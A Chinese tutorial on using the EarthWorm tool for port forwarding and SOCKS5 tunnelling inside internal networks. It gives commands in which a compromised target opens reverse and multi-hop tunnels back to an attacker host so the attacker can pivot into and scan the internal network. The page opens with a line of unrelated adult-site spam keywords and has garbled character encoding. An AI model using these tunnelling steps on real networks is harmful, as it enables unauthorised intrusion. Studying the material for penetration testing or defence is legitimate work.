超碰人人人人人,亚洲AV午夜福利精品一区二区,亚洲欧美综合区丁香五月1区,日韩欧美亚洲系列

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

[點(diǎn)晴永久免費(fèi)OA]EarthWorm(ew):復(fù)雜網(wǎng)絡(luò)環(huán)境下端口轉(zhuǎn)發(fā)及SOCKS5代理工具

admin
2024年5月13日 16:12 本文熱度 919

一句話說明:復(fù)雜內(nèi)網(wǎng)下,數(shù)據(jù)轉(zhuǎn)發(fā),轉(zhuǎn)出轉(zhuǎn)入工具;常用于socks5代理,深度掃描內(nèi)網(wǎng);

官方:EarthWorm是一款用于開啟 SOCKS v5 代理服務(wù)的工具,基于標(biāo)準(zhǔn) C 開發(fā),可提供多平臺間的轉(zhuǎn)接通訊,用于復(fù)雜網(wǎng)絡(luò)環(huán)境下的數(shù)據(jù)轉(zhuǎn)發(fā)。

零、前言

本文是在學(xué)習(xí)了下面參考文章的基礎(chǔ)上,基于自己的理解和心得補(bǔ)充了數(shù)據(jù)流量拓?fù)鋱D,這樣更好理解工具的使用場景和記住命令;本文僅作為技術(shù)交流。

一、要點(diǎn)先說

1.ew 自身的各個(gè)選項(xiàng)用途說明

-l 指定要監(jiān)聽的本地端口
-d 指定要反彈到的機(jī)器 ip
-e 指定要反彈到的機(jī)器端口
-f 指定要主動(dòng)連接的機(jī)器 ip
-g 指定要主動(dòng)連接的機(jī)器端口
-t 指定超時(shí)時(shí)長,默認(rèn)為 1000

2.正向代理和反向代理用途的區(qū)別

正向代理的典型用途是為在防火墻內(nèi)的局域網(wǎng)客戶端提供訪問Internet的途徑。
反向代理的典型用途是將防火墻后面的服務(wù)器提供給Internet用戶訪問。

3.rssocks 啟動(dòng)的socks5服務(wù),轉(zhuǎn)發(fā)到最后一步必須使用rcsocks接收

4.工具下載地址

http://rootkiter.com/EarthWorm/supportlist/

Program NameDescribeEg
ew_for_Win.exe適用各種Windows系統(tǒng)(X86指令集、X64指令集)Windows7、Windows XP
ew_for_Linux32各常見Linux發(fā)行版 (X86 指令集 CPU)Ubuntu(X86)/BT5(X86)
ew_for_linux64各常見Linux發(fā)行版 (X64 指令集 CPU)Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64MacOS系統(tǒng)發(fā)行版 (X64 指令集)蘋果PC電腦,蘋果server
ew_for_Arm32常見Arm-Linux系統(tǒng)HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel常見Mips-Linux系統(tǒng) (Mipsel指令集 CPU)螢石硬盤錄像機(jī)、小米mini路由器(R1CM)

二、端口轉(zhuǎn)發(fā)功能

場景一

在攻擊機(jī)運(yùn)行工具,主動(dòng)連接靶機(jī)3389端口,并將靶機(jī)的3389映射到攻擊機(jī)本地1080端口;達(dá)到在攻擊機(jī)側(cè)訪問本地1080端口,將數(shù)據(jù)轉(zhuǎn)發(fā)到靶機(jī)3389;

./ew -s lcx_tran -l 1080 -f 114.114.114.114 -g 3389

場景二

攻擊機(jī)側(cè)運(yùn)行工具,做1080端口轉(zhuǎn)發(fā)本地8080端口,且8080端口接受外部連接;靶機(jī)將本地3389端口數(shù)據(jù)轉(zhuǎn)發(fā)到攻擊機(jī)8080端口;
最終形成一條由靶機(jī)主動(dòng)外聯(lián)攻擊機(jī),并在靶機(jī)與攻擊機(jī)形成一條數(shù)據(jù)轉(zhuǎn)發(fā)通道:攻擊機(jī)1080<--------->3389靶機(jī)

第一步:./ew -s lcx_listen -l 1080 -e 8080
第二步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.1 -g 3389

三、socks5代理功能

場景一(正向代理)

在靶機(jī)側(cè)運(yùn)行工具監(jiān)聽1080端口對外提供socks5代理服務(wù);在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接靶機(jī)提供的socks5代理服務(wù),繼續(xù)滲透掃描內(nèi)網(wǎng)。

./ew -s ssocksd -l 1080

場景二(反向代理)

靶機(jī)側(cè)運(yùn)行工具,本地啟動(dòng)socks5服務(wù),主動(dòng)外聯(lián)攻擊機(jī)8080端口,攻擊機(jī)側(cè)運(yùn)行工具,將對外訪問的8080端口與到本地1080端口做映射,進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā);

第一步:./ew -s rcsocks -l 1080 -e 8080
第二步:./ew -s rssocks -d 114.114.114.114 -e 8080

場景三(正向代理):

靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具將本地從1080端口收到的數(shù)據(jù)全部轉(zhuǎn)發(fā)到靶機(jī)1086端口,在攻擊機(jī)側(cè)使用代理工具(例如:proxychains)連接邊緣機(jī)提供的1080端口;最終達(dá)到攻擊機(jī)側(cè)與靶機(jī)之間形成socks5代理通道,繼續(xù)滲透掃描內(nèi)網(wǎng)。

第一步:./ew -s ssocksd -l 1086
第二步:./ew  -s lcx_tran -l 1080 -f 10.0.0.2 -g 1086

場景四(反向代理):

靶機(jī)側(cè)運(yùn)行工具啟動(dòng)socks5服務(wù),邊緣機(jī)側(cè)運(yùn)行工具連接靶機(jī)1086端口并主動(dòng)外聯(lián)攻擊機(jī)8080端口;攻擊機(jī)側(cè)運(yùn)行工具,對外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<--->靶機(jī)之間形成一條代理通道;

第一步:./ew -s ssocksd -l 1086
第二步:./ew -s lcx_listen -l 1080 -e 8080
第三步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 1086

場景五(反向代理)-復(fù)雜型多級聯(lián)接

靶機(jī)側(cè)運(yùn)行工具本地啟動(dòng)socks5服務(wù)并反向連接中間機(jī)7777端口;中間機(jī)側(cè)運(yùn)行工具將9999端口與7777端口數(shù)據(jù)轉(zhuǎn)發(fā)互通;邊緣機(jī)側(cè)運(yùn)行工具,通過主動(dòng)外聯(lián)攻擊機(jī)8080端口將數(shù)據(jù)轉(zhuǎn)發(fā)到中間機(jī)9999端口;攻擊機(jī)側(cè)運(yùn)行工具,對外監(jiān)聽8080端口,并將數(shù)據(jù)轉(zhuǎn)發(fā)到本地1080端口;最終實(shí)現(xiàn)在攻擊機(jī)側(cè)1080端口<--->靶機(jī)之間形成一條代理通道;

第一步:./ew -s lcx_listen -l 9999 -e 7777
第二步:./ew -s rssocks -d 10.0.1.2 -e 7777
第三步:./ew -s rcsocks -l 1080 -e 8080
第四步:./ew -s lcx_slave -d 114.114.114.114 -e 8080 -f 10.0.0.2 -g 9999

四、最后說點(diǎn)什么

1.耐下心來

剛開始看到這個(gè)工具本想一看而過,后來耐心的學(xué)習(xí)一下,打開了新世界。

2.動(dòng)手實(shí)踐

看了很多文章也包括官方的文檔;發(fā)現(xiàn)對小白來說想了解工具功能和不同場景,單看文字不直觀,沒有網(wǎng)絡(luò)拓?fù)浜茈y理解。所以本著自己邊學(xué)習(xí)邊記錄邊分享的精神,整理了這篇文章。

3.橫向比較

3.1還發(fā)現(xiàn)了這個(gè)作者的另一個(gè)好用的工具Termite;目前EW和Termite作者已經(jīng)不維護(hù)了;工具下載方式如下:

#git clone https://github.com/rootkiter/Binary-files.git
#cd Binary-files
#git checkout bd32230
HEAD 目前位于 bd32230 fix ew version
#ls
EarthWorm README.md Termite

其中Termite文件夾下面就是工具;

3.2然后我在學(xué)習(xí)Termite的過程中又找到了一個(gè)和Termite功能基本一致的工具Venom(地址:https://github.com/Dliv3/Venom),我可以說這兩個(gè)工具對我來說可以算是“神器”了!因?yàn)楸酒攸c(diǎn)是介紹EW的使用方法,后面再根據(jù)情況,也記錄一下這兩個(gè)“神器”工具的使用;

感興趣的小伙伴可以學(xué)習(xí)一下Termite/Venom,玩起來挺爽;

參考文章:

0.項(xiàng)目主頁

http://rootkiter.com/EarthWorm/

1.內(nèi)網(wǎng)穿透的n種姿勢

https://xz.aliyun.com/t/9454?accounttraceid=69827aec0fbd4da68045e255cee9fd32xlwo

2.EW使用

https://blog.csdn.net/ws13129/article/details/94445378

3.內(nèi)網(wǎng)滲透入門到放棄之必備殺器

https://www.shangyouw.cn/win7/arc36509.html

4.Termite官方介紹說明

http://rootkiter.com/Termite/

http://rootkiter.com/Termite/README.txt

https://github.com/rootkiter/Termite

5.Venom官方介紹說明

https://github.com/Dliv3/Venom


該文章在 2024/5/14 17:59:31 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved